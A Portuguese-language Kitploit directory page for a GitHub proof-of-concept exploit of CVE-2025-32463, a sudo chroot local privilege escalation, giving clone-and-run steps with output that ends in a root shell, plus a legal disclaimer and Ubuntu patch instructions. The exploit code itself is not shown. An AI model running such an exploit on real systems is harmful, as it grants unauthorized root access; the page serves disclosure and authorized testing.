Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32463 — # CVE-2025-32463 – Exploit de EoP do Sudo (PoC) com .so pré-compilado | Kitploit
Ferramentas/GitHubGitHub/zinzloun/cve-2025-32463
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e Educação
GitHubzinzloun/cve-2025-32463

CVE-2025-32463

# CVE-2025-32463 – Exploit de EoP do Sudo (PoC) com .so pré-compilado

Ver Repositório
1479há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32463 – Exploit de EoP do Sudo (PoC) com biblioteca pré-compilada

Este repositório contém um exploit de prova de conceito (PoC) para CVE-2025-32463, uma vulnerabilidade de escalonamento local de privilégios no sudo descoberta por Rich Mirch.

Crédito

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ Aviso legal

Este PoC é apenas para fins educacionais e de testes autorizados. Não use este código em sistemas que você não possui ou para os quais não tenha permissão explícita de avaliação.


🔧 Requisitos

  • sudo com suporte a chroot (-R): versões 1.9.14 a 1.9.17
  • nsswitch habilitado

🚀 Como executar o POC

git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

Verifique se o usuário atual tem privilégios baixos

:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

Verifique os requisitos

:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

Execute o exploit

:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 Remediação no Ubuntu 24.04 LTS

  • Para sistemas conectados, basta executar

    sudo apt update && sudo apt upgrade
    
  • Para sistemas isolados (air gap): você pode obter o último pacote do sudo aqui: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Depois que o pacote for transferido para o sistema de destino, basta executar:

     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
Baixar ferramenta